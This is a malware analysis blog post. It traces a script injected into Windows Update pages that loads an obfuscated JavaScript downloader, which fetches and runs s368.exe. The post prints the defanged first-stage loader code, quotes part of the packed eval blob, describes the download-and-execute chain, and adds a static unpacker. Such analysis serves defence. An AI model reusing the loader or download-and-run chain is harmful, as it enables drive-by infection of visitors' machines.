Was the Windows Update website hacked, or is it the ARP virus? Virus.Win32.AutoRun.am
Endurer original, 1st version
When I turned on my computer this morning I found that Windows Update was slow, so I opened http://www.windowsupdate.com/ manually, but the page was a pile of garbage ~
Selecting "Windows Update" from the Start menu opens http://windowsupdate.microsoft.com/, which displays the same thing as http://www.windowsupdate.com.
Check the IP address.
D:\PE\test>ping www.windowsupdate.com
Pinging windowsupdate.microsoft.nsatc.net [207.46.225.221] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 207.46.225.221:
Packets: Sent = 4, received = 0, lost = 4 (100% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 0 ms, maximum = 0 ms, average = 0 ms
[Query results] Your query: [IP address] 207.46.225.221 => 207.46.225.221
· Main data on this site: Microsoft, Redmond, Washington, USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: Microsoft USA
· Reference Data 2: USA
[Query] www.123cha.com
D:\PE\test>ping windowsupdate.microsoft.com
Pinging windowsupdate.microsoft.nsatc.net [207.46.18.94] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 207.46.18.94:
Packets: Sent = 4, received = 0, lost = 4 (100% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 0 ms, maximum = 0 ms, average = 0 ms
[Query results] Your query: [IP address] 207.46.18.94 => 207.46.18.94
· Main data on this site: Microsoft, Redmond, Washington, USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: Microsoft USA
· Reference Data 2: USA
The IP addresses are normal.
The page source looks like this:
/---
<SCRIPT src=hxxp://c***k**1*.in/n**.js></SCRIPT>
[the rest of the response body is unreadable binary data; omitted]
---/
D:\test>ping c***k**1*.in
Pinging c***k**1*.in [209.11.243.35] with 32 bytes of data:
Reply from 209.11.243.35: bytes = 32 time = 479 Ms TTL = 116
Reply from 209.11.243.35: bytes = 32 time = 411 Ms TTL = 116
Reply from 209.11.243.35: bytes = 32 time = 375 Ms TTL = 116
Request timed out.
Ping statistics for 209.11.243.35:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in Milli-seconds:
Minimum = 375 ms, maximum = 479 ms, average = 316 ms
Your query: [IP address] 209.11.243.35 => 209.11.243.35
· Main site data: USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: USA
· Reference Data 2: USA
Source of hxxp://c***k**1*.in/n**.js:
/---
// writes a tag that loads the second-stage script
document.writeln("<SCRIPT src=\"hxxp:\/\/c***k**1*.in\/s368\/newjs***2.js\"><\/SCRIPT>");
document.writeln("<SCRIPT>");
document.writeln("function start(){");
document.writeln("var then = new Date()");
document.writeln("then.setTime(then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"cookie1=\"");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){");
document.writeln("} else ");
// sets cookie1 with a 24-hour expiry if it is not already present
document.writeln("{document.cookie = \"cookie1=popw.s; expires=\" + then.toGMTString()");
document.writeln("");
document.writeln("}");
document.writeln("}");
document.writeln("start();");
document.writeln("</SCRIPT>")
---/
hxxp://c***k**1*.in/s368/newjs***2.js uses eval() to run obfuscated ("encrypted") code:
/---
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1a("\\i\\g\\e\\h\\j\\2...(omitted)...|X2a|eval'.split('|'),0,{}))
---/
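As an added analysis example (not code from the original post), the decode step of the packer above reimplemented without eval() and applied repeatedly to peel nested layers; the blobs it runs on are constructed here, and PACKER_BODY quotes the packer body from the blob above only to build them.

```javascript
// Static unpacker for the eval(function(p,a,c,k,e,d){...}) packer used by
// newjs***2.js above: it reproduces the decode step in plain code instead of
// handing the blob to eval(), and repeats it while the output is still packed.
// Added analysis example, not the post's code; sample blobs are constructed.
const PACKED_RE =
  /eval\(function\(p,a,c,k,e,d\)\{[\s\S]*?\}\('((?:[^'\\]|\\[\s\S])*)',(\d+),(\d+),'((?:[^'\\]|\\[\s\S])*)'\.split\('\|'\),0,\{\}\)\)/;
// Undo the string-literal escaping used inside the packed payload.
function unescapeLiteral(s) {
  return s.replace(/\\([\s\S])/g, (_, ch) => ({ n: '\n', r: '\r', t: '\t' })[ch] || ch);
}
// The packer's own symbol encoder: index -> base-a token (0-9, a-z, A-Z).
function encodeSymbol(n, a) {
  const head = n < a ? '' : encodeSymbol(Math.floor(n / a), a);
  const r = n % a;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}
// One decode round: swap every token in p for its dictionary word; null if
// the input does not look like a packed blob.
function unpackOnce(blob) {
  const m = PACKED_RE.exec(blob);
  if (!m) return null;
  const p = unescapeLiteral(m[1]);
  const a = Number(m[2]);
  let c = Number(m[3]);
  const k = unescapeLiteral(m[4]).split('|');
  const dict = new Map();
  while (c--) dict.set(encodeSymbol(c, a), k[c] || encodeSymbol(c, a));
  return p.replace(/\b\w+\b/g, (w) => (dict.has(w) ? dict.get(w) : w));
}
// Peel nested layers until plain code remains; rounds is 0 for plain input.
function unpackAll(blob, maxRounds = 10) {
  let code = blob, rounds = 0, next;
  while (rounds < maxRounds && (next = unpackOnce(code)) !== null) { code = next; rounds++; }
  return { code, rounds };
}
// Builds constructed test blobs in the packer's call shape (body copied from
// the sample above); only the tokenised payload and word list vary.
const PACKER_BODY = "e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p";
function packedCall(p, a, c, words) {
  const q = (s) => s.replace(/\\/g, '\\\\').replace(/'/g, "\\'");
  return `eval(function(p,a,c,k,e,d){${PACKER_BODY}}('${q(p)}',${a},${c},'${q(words)}'.split('|'),0,{}))`;
}
// Constructed two-layer sample: INNER decodes to a one-line script; OUTER
// wraps it again with only the word "document" tokenised as "B".
const INNER = packedCall('3 4=0.1;2(4)', 10, 5, 'document|cookie|alert|var|x');
const OUTER = packedCall(INNER.replace('document', 'B'), 62, 38, '|'.repeat(37) + 'document');
```

Run unpackAll(OUTER) to get the plain script back after two rounds; the blob on the page needed three.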
After three rounds of unpacking the original code is obtained. It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download s368.exe and save it to %WINDIR%; the file name is produced by a user-defined function:
/---
function gnms(n)
{
    // random number below n, used to build a unique temp file name
    var numberms = Math.random() * n;
    return '~temp' + Math.round(numberms) + '.tmp';
}
---/
to generate the name, i.e. ~temp*****.exe, where ***** is a number. The file is then run through the ShellExecute method of a Shell.Application object with the command %WINDIR%\system32\cmd.exe /c %WINDIR%\~temp*****.exe.
File description: D:\test\s368.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 8:39:29
Modification time: 8:39:29
Access time:
Size: 23087 bytes, 22.559 KB
MD5: a0795ad6df991d65b38968ced427f09b
ExeStealth 2.0 - 2.4 -> WebToolMaster
Subject: Re: s368.exe [KLAB-2419187]
Sender: "" <newvirus@kaspersky.com>
Sent at: 13:58:48
s368.exe - Virus.Win32.AutoRun.am
New malicious software was found in this file. Its detection will be added in the next update. Thank you for your help.
Please quote all when answering.
--
Best regards, Boris Yampolsky
Virus analyst, Kaspersky Lab.
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com/
http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.
I downloaded it again to check and found that the file's MD5 value had changed:
File description: D:\test\s368.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 19:43:49
Modification time: 19:43:50
Access time:
Size: 23087 bytes, 22.559 KB
MD5: e277b83f3eedac59ec0077bb981e4082